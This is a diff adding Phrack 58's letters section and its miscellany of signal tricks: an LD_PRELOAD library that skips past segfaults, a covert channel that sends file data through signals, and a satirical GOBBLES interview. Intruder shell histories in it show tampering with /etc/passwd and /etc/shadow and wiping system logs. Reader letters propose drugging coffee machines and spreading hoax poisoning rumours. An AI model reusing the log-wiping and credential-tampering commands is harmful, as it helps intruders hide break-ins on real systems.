+          first choice and a 'must-scan' for every script kiddie).
+[08:38] - next scan...again from ip a.b.c.d, same port range (doh!).
+[08:41] - AGAIN!...(same src ip, same port range, ...man nmap ?).
+[09:07] - "last message repeated 5 times"
+[09:08] - boredom took over and someone decided to take a closer look at
+          the host and the kid who needs some training lessons in nmap...
+staff@phrack.org $ telnet a.b.c.d 1524
+Connected to a.b.c.d.
+Escape character is '^]'.
+
+                     Backdoor Server
+
+                            FUCK OFF!!
+                          By : krunch
+
+Backdoor Authorized Code: you_are_an_idiot
+Screw you dude !!!
+#
+
+|=[ 0x01 ]=--------------------------------------------------------------=|
+
+  [ found on some .edu host - shared by students and teachers ]
+
+haxor #1 (/root/.bash_history):
+
+  find /users/teach -name test
+  find /users/teach -name exam
+  exit
+
+haxor #2 (/.sh_history, already root...)
+
+  pico /etc/passwd
+  whereis pico
+  vi /etc/passwd
+  cat /etc/passwd
+  vi /etc/passwd
+  passwd dre
+  whereis adduser
+  vi /etc/shadow
+  su dre
+  exit
+
+haxor #3
+
+  cd exams
+  ls
+  pwd
+  cd /var/adm
+  ls
+  rm -Rf lastlog messages utmp utmpx wtmp wtmpx
+  exit
+
+haxor #4
+
+  telnet localhost 60606
+  cd /var/adm
+  ls
+  rm messages utmp utmpx wtmp wtmpx lastlog -Rf
+  y
+  exit
+
+haxor #6:
+ 
+  id
+  cd /var/log
+  ls
+  grep <evil haxor ip> *
+  cd ..
+  ls
+  find /var | grep <evil haxor ip>
+  cd adm
+  ls
+  rm messages wtmp -Rf
+  exit
+
+haxor #7:
+ 
+  ./in.telnetd
+  mv in.telonetd sh
+  ./sh example.conf
+  mv in.telnetd sh
+  ./sh example.conf
+  exit
+
+|=[ 0x02 ]=--------------------------------------------------------------=|
+  
+  [ ..while grep'ing through the filtered mails from phrackstaff@phrack.org
+    we found someone flirting with our mailman-mailinglist-manager... ]
+
+From: Per1805@aol.com
+Subject: Re: Your message to phrackstaff awaits moderator approval
+
+thank u   very  much
+
+  [ np ]
+
+|=[ 0x03 ]=--------------------------------------------------------------=|
+
+From: blitz <blitz@macronet.net>
+
+Good to read a fresh Phrack. I go back quite a way (he says as he scratches
+his grey beard) with you guyz. Best of luck to the new staph...er staff,
+keep on kickin ass.
+
+  [ ...fresher than an androids ass, spicier than uncle joey's
+    pizza, hotter than a smoking FBI gun...GO GET PHRACK58 !%$!#$^... ]
+
+|=[ 0x04 ]=--------------------------------------------------------------=|
+
+From: Poisonoak55@aol.com
+Date: Sat, 1 Dec 2001 17:36:57 EST
+Subject: ????????????
+To: webmaster@phrack.org
+
+What is this all about?
+
+  [ It's about sex drugs and rock'n'roll, pure violence and brutal
+    rapings. It's about building bombs, penetrating military protected
+    buildings and taking over the world. The same thing we do every
+    night pinkey. ]
+
+|=[ 0x05 ]=--------------------------------------------------------------=|
+
+  [ comments by an anonymous user on the webpage: ]
+
+Umm..the loopback 0x16 and 0x0f are the same...
+
+  [ ...and the Jedi Knight _again_ replied with a strong tongue:
+   "They are not!" ...and _again_ swang his hand from the left to
+   the right with a slight hope to bluff the audience a second time... ]
+
+|=[ 0x06 ]=--------------------------------------------------------------=|
+
+  From: "Vergoz Michael" <descript@subk.org>
+  a test image for phrack for futur and current paper
+
+  [ yeah! Mr. super kewlio you are. And by the way: the name of the
+    magazine is 'PHRACK' not 'PHREAK' - fix the grfx |@$#@#$^%!$%... ]
+
+|=[ 0x07 ]=--------------------------------------------------------------=|
+
+From: Delta-Master <Falinra@yahoo.com>
+Subject: [phrackstaff] Any old school?
+
+Just curious if this is run by newbies, or if there are any old-school
+people who might remember Delta-Master.  
+
+  [ ...some are new, others contributed to earlier phrack issues
+    and the rest leeched their first phrack over a 1200baud line... ]
+
+Any contact info for Bill from RNOC or any other LOD/H people still around?
+What ever happened to Craig&Randy?  Makes me want to have a giant
+"Where are they now" list.
+
+D-M
+
+|=[ 0x08 ]=--------------------------------------------------------------=|
+
+From: jennifer hansen <littlemisspatriot@yahoo.com>
+To: jericho@attrition.org, dover@dis.org, emmanuel@2600.com,
+  cmeinel@techbroker.com, veggie@cultdeadcow.com, loopback@phrack.org,
+  jefe@reject.org
+
+I got your email addresses from "The Notorious B.O.O.G.". 
+
+  [ Yeah babe, he is a very close friend of all of us! ]
+
+I've been stuck in the past few days with
+what an effective strategic & tactical position the
+hacker community inhabits in war time.
+
+  [ Woah. Here we go. Uncle Sam unlock your weapon, target your enemy
+    and wait for further instructions. Side by side 
+    littlemisspartrior@yahoo.com we will fight for the right until a
+    silver bullet hits the eye and lets us die. ]
+
+The following is an email that I sent to "The
+Notorious B.O.O.G." and that he posted (with his
+response) on www.guerrillanews.org on 9.19.2001.
+
+  [ Y0. I've got some 30,000 warriors gathering at Norad. Let's unite
+    your Mao Tse Tung guerilla's with my troops and prepare a full blown
+    first strike nuclear offense against..whatever...who cares. BOOM BOOM. ]
+
+I am engaged in independant research of terrorist
+organizations.  I would love to discuss these ideas
+further with you if you have interest.
+
+  [ RIGHT ON! y0 mrs.LittleMissPatriot, we already have all this stuff
+    about building bombs and blowing away things in phrack1..7. I can
+    forward you some never published articles about how to build
+    nuclear warheads and biochemical warfare! ]
+
+|=[ 0x09 ]=--------------------------------------------------------------=|
+
+From: Phosgene  <phosgene@setec.org>
+
+United Future Underground
+By Iconoclast
+
+This is the long distance call,
+Telephoning one and all,
+Hackers and Phreakers Unite!
+Organize and join the fight!
+
+To those who play with phones,
+And those who record the tones,
+To those who hack the code,
+And those who change the mode,
+To those who scan the waves,
+And those who encrypt their saves,
+To those who build with chips,
+And those who program MIPS.
+
+Each passing day brings new laws
+Perceived crimes without a cause,
+Your freedoms and liberties
+Are outlawed this day you see,
+Fear, uncertainty and doubt
+Feed Big Brother's deadly route.
+
+Will they demand your crypto key?
+Stand up and save your liberty!
+Will they take your frequencies?
+Or sell them at the highest fee?
+
+Will they impose a modem tax,
+And crank it up high to the max?
+Will they tap your telephone line?
+Since the FBI thinks its fine!
+
+Illegal information?
+Surveillance of a nation!
+Censorship of silent truth?
+We have the encrypted proof!
+
+Its long past time we undertook
+Steps to prove we're not evil crooks.
+Educate the public today
+On the path of the true hacker way.
+
+  [ ... ]
+
+|=[ 0x0a ]=---------------------------------------------------------------=|
+
+From: "Shai Hulud"
+
+is there a way I can get an issue of phrack sent to me, I'll mail for
+shipping or whatever, just give me an address or something for me to send
+the money.
+Thanks for your time
+
+  [ You think you can miss HAL? think you can miss the release party?
+    think you can kiss a little bit of the phrackstaff's shiny metal ass 
+    and beg for a hardcover? NO FUCKING WAY! ]
+
+p.s.
+i like photo sex
+
+  [ !%$@#% TAKE OFF YOUR HANDS FROM THE HARDCOVER! DONT EVEN THINK
+    ABOUT TOUCHING IT WITH YOUR DIRTY FINGERS !%@#$% ]
+
+|=[ 0x0b ]=---------------------------------------------------------------=|
+
+From: Junk-B.-FF@ifrance.com
+
+You may think I'm just a pseudo anarchist, a "fight club" fan, but
+it's true : one day or the other, we'll all end up as slaves of larges
+corporations.
+
+  [ NO! You are serious, and only serious people make it into Loopback. ]
+
+You are all making effort to avoid this. thank You.
+
+  [ Our secret mission is to form phrack & Co. to control the slavery. ]
+
+We need to go further, and this is the point of this mail :
+we need to transpose hacking to the offline world:
+
+  [ NO BRAIN. NO DICK. NO CARRIER. ]
+
+we need to get falsified medical prescription and put Valium in coffee
+machines. We need to spread false rumours harming corporations, like there
+is arsenic in procter & gamble soap, things like that, u see?
+
+  [ http://www.phrack.org/howto - we do not publish information which
+    is already known to the public. ]
+
+we need to glue the locks of offices, police stations, luxuous cars, maybe
+even schools!
+
+  [ maybe your ass ? or maybe you should stop sniffing glue ? ]
+
+nothing is static, everything is falling apart.
+Thanks. (and sorry...I think I've wrote crap, but you got the idea....)
+Junk
+
+|=[ 0x0c ]=---------------------------------------------------------------=|
+
+From: Kubas Mail <kuba9999@yahoo.com>
+
+  [ ...nonsense here...]
+
+jakob
+
+=====
+unsolicted mail is against federal law.
+
+  [ You've just been charged by Phrack Inc. with 100$ for unsolicted mail. ]
+
+|=[ 0x0d ]=---------------------------------------------------------------=|
+
+From: "Bandler, James" <James.Bandler@wsj.com>
+
+greetings, i'm a reporter with the wall street journal looking for a primer
+on cable tv signal scrambling.
+
+  [ greetings, i'm the editor in chief of the phrack street journal. ]
+
+I'm trying to find a Carl Corey, or perhaps, other experts on the subject.
+
+  [ WHAAAAAAAAAT? I'm not directory assistance.  How long have you been at 
+  WSJ? You should know it's a big 'no no' to ask stupid questions for 
+  answers that can be found at http://www.yellowpages.com. ].
+
+James Bandler
+Phone: 617-654-6864
+
+  [ dont call us, we'll call you. ]
+
+|=[ 0x0e ]=---------------------------------------------------------------=|
+
+im so happy that you have the website up again i love the nostalgia
+
+  [ we're so happy we were able to do it ]
+            
+and plus phrack 57 is quite new
+
+  [ are you going to say previous volumes weren't?! ]
+
+|=[ 0x0f ]=---------------------------------------------------------------=|
+
+sorry for soo lamer question ....
+i am very newbie ....
+
+i am interested in phreaking ....
+and i heard on irc , you have new magazine ...
+
+   [ Yeah! we have *new* magazine ]
+
+but i read something ...
+and i dont understand anything ....
+
+   [ i bet you don't feel so good with this
+     i can remember how i felt when i didn't understand
+     what i read on some chinese box                    ]
+
+where can i start ??
+
+   [ you can start everywhere ]
+
+... i dont wanna old things (red boxing is no more usefull in my country :)
+
+   [ WHAT?! it is not?! DAMN! ]
+
+.. can you help me ??
+
+   [ i will try my the best ]
+
+maybee some links ??
+
+   [ www.google.com ]
+
+and please ... dont give my mail in some loopback :)
+
+   [ OK.. hmmm Wait! Why not??? ]
+
+see ya, peter
+
+|=[ 0x10 ]=---------------------------------------------------------------=|
+
+From: Socrates <socrates@lorettotel.net>
+X-Mailer: Microsoft Outlook Express 5.50.4522.1200
+
+This message is to all members of the Legion Of Doom (professional):
+
+  [ phrack != LOD (we already had this topic during operation sundevil
+    11 years ago) ]
+
+I would like to know how i can become a member of the LOD.Please post
+
+  [ Try to fill out the red application form, take an envelope and send it
+    to the LOD HQ. If you are a lucky guy someone will reply to you.
+    Otherwise, someone will come and punch your head against the wall for
+    being the most stupid human on planet phrack^H^H^H^H^H^Hworld. ]
+
+the information,so i can become a member.I'm a professional Hacker and
+my expertise is also in making homemade Fireworks and
+Explosives,revenge,mayhem,ect..
+
+
+                                          Dr.Frankenstein
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack58/3.txt b/phrack58/3.txt
new file mode 100644
index 0000000..87f814f
--- /dev/null
+++ b/phrack58/3.txt
@@ -0,0 +1,676 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x03 of 0x0e
+
+|=----------------------=[ S I G N A L N O I S E ]=----------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------------------=[ phrackstaff ]=---------------------------=|
+      _                                                              _
+     /     "crrr...Everything that does not fit somewhere else...crr" \
+    |-+ - - -   "can be found here. Corrections and additions" - - - +-|   
+    |\_  "to previous articles, to short articles or articles that"  _/|
+    |      "just dont make it....everything...crr..<NO CARRIER>"       |
+ _=====_                                                            _=====_
+
+  0x00:  SIGOOPS
+  0x01:  No SIGSEGV anymore
+  0x02:  covered IPC via TCP over signal()
+  0x03:  SIGnalINTelligence warrant of apprehension on gobbles
+
+|=[ 0x00 ]=--------------------------------------------------------------=|
+
+  p57-02/loopback: 0x16 and 0x0f are the same. Oops.
+
+  We forgot to mention the email of brett (variablek@home.com) who wrote
+  the cisco addendum in p57-03/linenoise.
+
+|=[ 0x01 ]=--------------------------------------------------------------=|
+
+Subject: Getting rid of SIGSEGV - for fun but not for profit.
+
+  UNIX signals provide a mechanism for notiying processes of system
+events, communication [see below :P] and syncronization between
+processes and exception handling. Most readers are familiar with
+the term 'software generated signals' (generated by the kernel or userland
+application) and 'cpu exceptions'.
+
+  The most famous and by far the most hated signal under UNIX is 
+SIGSEGV. The signal is usually generated by the kernel when
+'something realy bad happened' or something 'your hardware is really
+not amused about'. The hardware 'is not amused' about illegal memory
+references and notifies the kernel (cpu exception) which in turn notifies
+the offending process with a signal. The default action is to terminate
+the running process and to dump core.
+
+  What would happen if the process could recover from such a SIGSEGV and
+continue execution? After a SIGSEGV the process is in an undefined state
+and basicly everything could happen. In many cases the result is by far less
+extrem as we would expect. We may experience missing grafics in netscape, no
+background image in Eterm or missing frames in a .avi movie.
+
+  A programm may use signal(SIGSEGV, SIG_IGN); to ignore a SIGSEGV sent
+by another process. A cpu exception generated by the hardware will still
+cause the process to terminate (default action). A process may choose to
+override the default action and specify a signal handler - a user-defined
+function which is invoked whenever a SIGSEGV is delivered to the process.
+We will concentrade on SIGSEGV caused by a cpu exception only - recovering
+from all other cases is trivial.
+
+  Let's first take a look at the kernel and follow the path of the SIGSEGV
+until it gets delivered to the application. After our little excurse I
+will show some source which, compiled as a shared object, can be
+preloaded (LD_PRELOAD) to any programm. The preloaded .so will recover
+(at its best) from a SIGSEGV and continue execution.
+
+  When the system boots, the function arch/i386/kernel/traps.c:trap_init()
+is called which sets up the Interrupt Descriptor Table (IDT) so that
+vector 0x14 (of type 15, dpl 0) points to the address of the page_fault entry
+from arch/i386/kernel/entry.S. The entry invoked do_page_fault() in 
+arch/i386/mm/fault.c whenever the specific exception occures. This function
+handles all kind of page faults and calls 'force_sig_info()' if the
+exception was caused by user mode access to invalid memory. This function
+forces signal delivery to the userland applicationg by unblocking the signal
+and by setting SIG_IGN to SIG_DFL (if no handler has been assigned).
+To cut a long story short the kernel drops into send_sig_info() which
+calls deliver_signal() which calls send_signal() which calls
+sigaddset() which finaly set the bit in the process signalbitmask.
+
+  It is important to note that any action, including process termination,
+can only be taken by the receiving process itself. This requires, at the
+very least, that the process be scheduled to run. In between signal
+generation and signal delivery, the signal is said to be pending to the
+process.
+
+  When a process is scheduled to run the kernel checks for pending
+signals at the following times:
+
+- Immediatly after waking up from an interruptible event.
+- Before returning to user mode from a system call or interrupt.
+- Before blocking on an interruptible event.
+
+  The kernel calls arch/i386/kernel/signal.c:do_signal() and fetches the
+first pending signal from the queue (kernel/signal.c:dequeue_signal()).
+Nothing spectacular happens and the kernel processes with the next pending
+signal from the queue if action is set to SIG_DFL or SIG_IGN. The kernel
+calls handle_signal() if a user-defined action has been assigned to the
+signal handler (ka->sa.sa_handler). 
+
+  If the signal event occured during a system call with restarting capability
+the eip of the process is substracted by the value of 2 to automaticly
+reinvoke the system call after the signal handler returned. The kernel calls
+setup_frame() to save the current register set and other values (see 
+'struct sigframe' in arch/i386/kernel/signal.c) on the stack of the process.
+The same function also sets up a 'stub' which is executed after the signal
+handler returned to restore the previous saved 'sigframe'.
+
+    struct sigframe
+    {
+        char *pretcode;                /* 4 bytes                        */
+        int sig;                       /* 4 bytes                        */
+        struct sigcontext sc;          /* 88 bytes, see sigcontext.h     */
+        struct _fpstate fpstate;       /* 624 bytes, floating point regs */
+        unsigned long extramask[1];    /* 4 bytes                        */
+        char retcode[8];               /* 8 bytes                        */
+    };
+
+struct sigcontext expands to:
+
+    struct sigcontext
+    {
+        ...                            /* ...56 bytes                    */
+        unsigned long eip;             /* Aha!                           */
+        ...                            /* ...88 bytes                    */
+     };
+
+  The old eip is saved 64 bytes after the beginning of struct sigframe,
+followed by the return address of the signal handler and the saved frame
+pointer. The return address will points to the 'stub' which will pass
+control back to the kernel to restore the registers once the signal handler
+returns.
+
+           0xbfffffff  | ...                    |
+                       +------------------------+
+                       | sigframe, old eip      |
+                       | is saved 56 bytes      |  <---+
+                       | from behind retaddr    |      |
+                       +------------------------+    68 bytes distance to
+                       | retaddr of stub        |    saved eip from ebp.
+                       +------------------------+      |
+             ebp->     | saved frame pointer    |  <---+
+                       +------------------------+
+                       | local variables of     |
+                       | signal handler routine |
+                       +------------------------+
+
+  The easiest way to recover from a SIGSEGV thus is to assign our
+own signal handler, travel up the stack until we find the saved
+eip, set the eip to the instruction followed the instruction which caused
+the segfault and return from our handler.
+
+
+  The library also ignores SIGILL just for the case in which the process
+starts to run amok and the IP hits space where no IP has gone
+before. 
+
+
+/*
+ * someone@segfault.net
+ *
+ * This is published non-proprietary source code of someone without a
+ * name...someone who dont need to be named....
+ *
+ * You do not want to use this on productivity systems - really not.
+ *
+ * This preload-library recovers from a SIGSEGV - for fun purposes only!
+ *
+ * $ gcc -Wall -O2 -fPIC -DDEBUG -c assfault.c
+ * $ ld -Bshareable -o assfault.so assfault.o -ldl
+ # $ LD_PRELOAD=./assfault.so netscape &
+ */
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+#include <dlfcn.h>
+
+#define REPLACE(a, x, y) if ( !(o_##x = dlsym(##a , ##y)) )\
+            { fprintf(stderr, ##y"() not found in libc!\n");\
+                exit(-1); }
+#ifdef DEBUG
+# define DEBUGF(a...)    do{fprintf(stderr, "%s[%d]", __FILE__, __LINE__); \
+                           fprintf(stderr, ##a);}while(0)
+#else
+# define DEBUGF(a...)
+#endif
+
+#define err_exit(str) do{fprintf(stderr, "ERROR:%s\n", str);exit(-1);}while(0);
+
+static void *(*o_signal)(int, void(*)(int));
+static void *libc_handle = NULL;
+static int sigcount;
+
+void
+assfault_handler(int sig)
+{
+    DEBUGF("SIG%s occured (%d)\n"
+           , (sig==SIGSEGV)?"SEGV":(sig==SIGILL)?"ILL":"BUS", ++sigcount);
+
+    asm volatile("incl 0x44(%ebp)");
+}
+
+void
+(*signal(int sn, void (*sighandler)(int)))()
+{
+    if ((sn == SIGSEGV) || (sn == SIGILL) || (sn == SIGBUS))
+    {
+        DEBUGF("signal(SIG%s, ...) intercepted [%d]\n"
+              , (sn==SIGSEGV)?"SEGV":(sn==SIGILL)?"ILL":"BUS", getpid());
+        return assfault_handler;
+    }
+
+    /* in all other cases call the original libc signal() -function */
+
+	return o_signal(sn, sighandler);
+}
+
+static void
+assfault_init(void)
+{
+    if ( (libc_handle = dlopen("libc.so", RTLD_NOW)) == NULL)
+        if ( (libc_handle = dlopen("libc.so.6", RTLD_NOW)) == NULL)
+            err_exit("error loading libc!");
+
+    /* get the address of the original signal() -function in libc */
+    REPLACE(libc_handle, signal, "signal");
+
+    /* redirect action for these signals to our functions */
+    o_signal(SIGSEGV, assfault_handler);
+    o_signal(SIGILL, assfault_handler);
+    o_signal(SIGBUS, assfault_handler);
+
+    dlclose(libc_handle);
+}
+
+/*
+ * called by dynamic loader.
+ */
+void
+_init(void)
+{
+    if (libc_handle != NULL)
+        return; /* should never happen */
+
+    assfault_init();
+    DEBUGF("assfault.so activated.\n");
+}   
+/*** EOF assfault.c ***/
+
+/*
+ * example programm that segfault's a lot.
+ * $ gcc -Wall -o segfault segfault.c
+ * $ LD_PRELOAD=./assfault.so ./segfault
+ */
+#include <stdio.h>
+int
+main()
+{
+    char *ptr=NULL;
+
+    fprintf(stderr, "|0| everything looks fine. lets produce a SIGSEGV\n");
+	*ptr=1;
+	fprintf(stderr, "|1| after first provocated SIGSEGV\n");
+    *ptr=1;
+    fprintf(stderr, "|2| after second provocated SIGSEGV\n");
+    fprintf(stderr, "|X| We survived - enough played today.\n");
+
+    return 0;
+}
+/*** EOF segfault.c ***/
+
+|=[ 0x02 ]=--------------------------------------------------------------=|
+
+Subject: TCP over signal()
+
+Bored subjects do naughty things, so why not transferring data
+with signals. With signals, not along with. Good old morsing
+hits us again. Theoretical speaking its a covert channel. A method for
+transferring data which is not recognized as transfer to the outside
+world.
+Things are simple, if sender sees a bit is 1 it sends 'HIGH'
+and 'LOW' if it finds the bit being 0.
+I let it to you to figure out how the simple programs work. :-)
+
+<recv.c>
+#include <stdio.h>
+#include <sys/types.h>
+#include <signal.h>
+
+#define L SIGHUP
+#define H SIGUSR1
+#define RESET SIGUSR2
+
+int bit;
+unsigned char c;
+
+void recv_high_low(int x)
+{
+	if (bit == 8) {
+		bit = 0;
+		putchar(c);
+		fflush(stdout);
+		c = 0;
+	}
+	if (x == H)
+		c = ((c<<1)|1);
+	else
+		c <<= 1;
+	++bit;
+}
+
+void recv_reset(int x)
+{
+	bit = 0;
+	c = 0;
+}
+
+int main()
+{
+	bit = 0;
+	c = 0;
+	
+	signal(L, recv_high_low);
+	signal(H, recv_high_low);
+	signal(RESET, recv_reset);
+	
+	for (;;);
+
+	return 0;
+}
+
+</recv.c>
+
+
+<send.c>
+
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <stdlib.h>
+
+#define L SIGHUP
+#define H SIGUSR1
+#define RESET SIGUSR2
+
+void die(char *s)
+{
+	perror(s);
+	exit(errno);
+}
+
+int main(int argc, char **argv)
+{
+	int pid, fd, j;
+	char *file, c;
+
+	if (argc < 3) {
+		fprintf(stderr, "Usage: %s <pid> <file>\n", argv[0]);
+		exit(1);
+	}
+
+	pid = atoi(argv[1]);
+	file = argv[2];
+
+	if ((fd = open(file, O_RDONLY)) < 0)
+		die("open");	
+
+
+	kill(pid, RESET);
+	sleep(1);
+	
+	while (read(fd, &c, sizeof(c)) > 0) {
+
+		/* and for every bit of this byte do */
+		for (j = 7; j >= 0; --j) {
+			if ((1<<j) & c) {
+				printf("1");fflush(stdout);
+				if (kill(pid, H) < 0)
+					die("kill");	/* send HIGH (1) */
+			} else {
+				printf("0");fflush(stdout);
+				if (kill(pid, L) < 0)	/* send LOW (0) */
+					die("kill");
+			}
+			usleep(200);
+		}
+	}
+	close(fd);
+	return 0;
+}
+
+</send.c>
+
+
+|=[ 0x03 ]=--------------------------------------------------------------=|
+
+* SIGINT CONFIDENTIAL REPORT ON GOBBLES *
+
+  On 2001/12/20 various individual around the world succeeded in
+unrevealing valuable information about the suspect. The information
+gathered about the suspect seems to be authentic - action should be taken
+immediatly by local law enforcements.
+
+      WANTED - GOBBLES - WANTED - GOBBLES - WANTED - GOBBLES - WANTED
+
+
+Do you have other handles beside 'Gobbles' ? 
+
+  GOBBLES is known as many things, but GOBBLES can not let the rest of the
+world know he other identities in relation to name of GOBBLES due to fear
+of social rejection from he peers.  GOBBLES wish at some point that people
+could stop asking, "GOBBLES who else are you known as" to him when all he
+really ask for is a little privacy, cannot people learn to keep their
+hands to what is their own?
+
+
+What kind of species is 'Gobbles' and what is the sex ? 
+
+  GOBBLES himself is homosapian (which mean human for all you penetrators)  
+obviously but like the name GOBBLES came from Yahoo.com picture turkey.jpg
+found one day which made GOBBLES think to self, "Hey this a funny looking
+picture and make me think of security community that full of evil turkies,
+hehe 'other identity' should now become known as GOBBLES to be security
+turkey too!". Gobbles Security is not limited to one person, or one gender.
+
+
+How can Gobbles Security  be reached (email? sms? irl? irc?) 
+
+  GOBBLES Security can be reached at group email addrses on hushmail.com
+which is GOBBLES@hushmail.com, if anyone ever need to contact us about
+anything that be the place to do it from.  As far as where one can find
+GOBBLES irl (that mean "in real life" for penetrators), GOBBLES originally
+from Lithuania but now live in a place with a little more stable economy.  
+Some GOBBLES Security members do live in same country and then they
+frequent GOBBLES Labs location to do hardcore hacking and programming all
+day long.  
+
+
+When and where have you been born ?
+
+  GOBBLES himself was born during year of 1979 in country of Lithuania, but
+not born as GOBBLES, hehe (that not real name ;), but real name shouldn't
+be of real concern anywhere though, so that do not matter.  GOBBLES was
+born into computer security industry scene as GOBBLES during the month of
+June in the year of 2001 and currently have plans of being immortal in
+this field and living forever. 
+
+
+Is there any picture available of Gobbles Security on the internet ? 
+
+  GOBBLES Security is more concerned with finding all exploitable bugs and
+letting the world know about them than they are with worrying about taking
+time to update webpage and get it pretty looking, although making webpage
+pretty and finish is becoming a higher GOBBLES priority due to demands of
+our many fans who email saying, "Please friend GOBBLES, finish webpage!"
+
+
+Where does Gobbles Security live (current location) ? 
+
+  To respect privacy of GOBBLES Security and members GOBBLES does not want
+to give out physical location of GOBBLES Labs or the IP addresses (that IP
+mean internet protocol, for penetrators needing translation).  Website of
+GOBBLES where information is fully disclosed is on bugtraq.org though.
+
+
+To which kind of music does Gobbles Security listen ? 
+
+  Right now the multiple cd player jukebox in GOBBLES Labs have cd's
+(compact disc for penetrator confusing cd with chdir) from following
+bands and artists:
+ -Radiohead
+ -Tori Amos
+ -The Violent Femmes
+ -KMFDM
+ -Goo Goo Dolls
+ -Savage Garden
+ -The Djali Zwan
+ -Dmitri Shostakovich
+ -Smashing Pumpkins
+ -Ace of Base
+ -They Might Be Giants
+ -Various Disney Soundtracks and Sing-a-long's
+
+so you get an idea of different genre's that are liked by people who
+occupy GOBBLES Labs facility, hehe.
+
+
+Does Gobbles Security like the movies 'Chicken run' and/or was any
+relative actively involved in the movie ? 
+
+  GOBBLES didn't really understand movie on his own, and consensus from
+other group members is that the movie was not very good.  GOBBLES spent
+the whole movie trying to identify celebrities with they cartoon
+characters instead of paying close attention to complex plot, so it can be
+understood why GOBBLES didn't really follow and understand the story of
+that movie.
+
+
+How many employees does 'Gobbles Security' currently have ? 
+
+  GOBBLES Security is not a for-profit group and does not have any income
+or employees.  Everyone who come to GOBBLES Labs to do coding and exploit
+bring own computers and materials and alcohol, there is no money involved
+so there are not any employees.  GOBBLES Labs have 19 active members and
+researchers.  With 18+ members, GOBBLES Labs is currently the largest
+active non-profit security team in the world (that not private and
+exclusive with research, of course there is larger private group in
+existance that GOBBLES not ignorant of).  Unlike other groups that make
+this claim, GOBBLES Labs is actually active, hehe. 
+
+
+Are there stocks available from 'Gobbles Security' ? 
+
+  Hehe, no, because remember we not a commercial organisation?  =)  GOBBLES
+believe that security should not be huge commercial entity anyways and
+miss the days when people who were knowledgable about security were
+respected and looked to for security information rather than people with
+certification like CISSP who qualified to use Nessus in corporate
+environment and notify they companies of updates on cert.org website.
+
+
+Is there any buisiness plan (current projects ?) of Gobbles Security
+for 2002 ? 
+
+  GOBBLES have no business plan, since GOBBLES Security is not a business,
+just more of a club, and GOBBLES hope to keep it that way forever.  If the
+big dollar is ever waived in GOBBLES face like happen to other good
+non-profit security group, GOBBLES will refuse to snatch it and keep
+GOBBLES Labs independant and free always.
+
+
+Where did Gobbles Security learn english ? 
+
+  GOBBLES Security is a multinational group and members have learned they
+English in many different places, some speak it natively, or at least
+American which is very similar to English from what GOBBLES can
+deduce.  GOBBLES learn English from Extreme Calculus professor in
+university who say to GOBBLES, "GOBBLES if you to go anywhere in life, you
+must learn to speak English, here I will help."  That is true story of how
+GOBBLES learn to speak this wonderful language, hehe.
+
+
+Have you heard of anti-security and what is your opinion to
+http://anti.security.is ? 
+
+  Yes GOBBLES have seen they website before and read message board very
+frequently.  GOBBLES think anti.security.is have many good ideas on
+security, since it seem that sometimes disclosure is not best since all it
+really do is contribute to system being comprimised.  GOBBLES recall
+reading somewhere that still only 30% of servers are patched for CORE-SDI
+ssh backdoor still, and that known almost for a year now, so sometimes
+GOBBLES wonder why disclosure is even done in the first place if no one
+really pay attention to advisory and fix security.  However this is not
+the policy of GOBBLES Security who are firm supporters of Information
+Anarchy and Jay Dyson's quote "Real men prefer full disclosure", although
+some GOBBLES researchers are very loyal to anti.security.is philosophy
+which is why you do not see all exploits written by GOBBLES Security
+members since we respect they wishes.  GOBBLES have many respect for
+ideals of anti.security.is and often wonders what really is best to
+improve state of security on the Internet, but still he decide that it is
+Information Anarchy.
+
+
+What does Gobbles Security think about Theo de Raadt ? 
+
+  GOBBLES think Theo is silly individual who think brilliant research and
+revelation of removing machine from network make it secure from network
+based attacks and therefor inpenetrable, because then what is the real use
+of that workstation when it not on a network and can't access
+anything?  GOBBLES think Theo attempt to banish all networking in name of
+security is idiotic idea and GOBBLES really not a big fan of his for this
+sorts of things.
+
+
+And about Aleph1 and bugtraq ? 
+
+  The Aleph1 is old friend of GOBBLES (but not someone the Aleph1 know as
+GOBBLES, hehe) and is someone that GOBBLES very much likes.  In question
+GOBBLES assume that bugtraq == securityfocus.com, so that how GOBBLES
+shall answer the question.  GOBBLES not a very big fan of securityfocus
+itself for way it do delayed disclosure, for way it claim to be full
+disclosure, but then make people have to pay to see good advisories first
+(holding information hostage probably not best practice for full
+disclosure), for filtering important security advisories because
+advisories have comments in that hurt pride of securityfocus staff
+member.  If it were real intentions of securityfocus to help in security
+process, GOBBLES think that they would pass important advisories through,
+but know from experience that many will be filtered for silly
+reason.  When securityfocus say, "hey, we will run mailing lists" they
+should have also let everyone know that they had intention of profitting
+off list and selling information rather than keeping them in original
+form, GOBBLES is bothered by level of deceit there.  But as for does
+GOBBLES like the Aleph1, the answer is YES, GOBBLES do like the
+Aleph1.  In fact GOBBLES have open invitation to him (and mudge and
+dildog) to leave they high paying jobs and the dark side of the force to
+join back where they know they want to be, in they hearts, back in the
+real security community where you don't have to shave you beard and give
+out real name; always extra room for them as members in GOBBLES Security
+if they ever decide to reform.
+
+Does Gobbles Security consider other groups like ADM, LSD, TESO as
+competitors or as friends ? 
+
+  GOBBLES Security think of those group as brothers and sisters, not as
+competitors.
+
+
+In which way will Gobbles Security infuence the scene in the future ? 
+
+  Well GOBBLES have the hope of helping rebirth of real security scene
+where the world can know who the people are who have real security
+knowledge are not the point and click penetrator testers and patch
+applicators who make the big dollar, and hopefully someday in future there
+will be not so much commercialization of computer security and thing can
+return back to normal and the scene can exist again once more.
+
+
+Write down 'Memorable Experiences': 
+ 
+  One time #GOBBLES on irc was taken over by prominant irc takeover gang
+which is very memorable experience for the whole GOBBLES Security
+Crew.  Some things that stuck with GOBBLES from incident include:
+
+  <route> gogogogo
+  <route> OK, newsh fork over the opz
+  <route> word
+  <route> ok listen up motherfuckerz
+  <route> u will get yer chan back when i see fit
+  <route> mmkay?
+  <route> now, who'z the fuckwit who insulted me in that yahoo messenger
+          advisory?
+  <route> you mess with libnet, you mess with death motherfuckerz!
+
+  [ note by phrackstaff: The above log isn't from the real route. ]
+
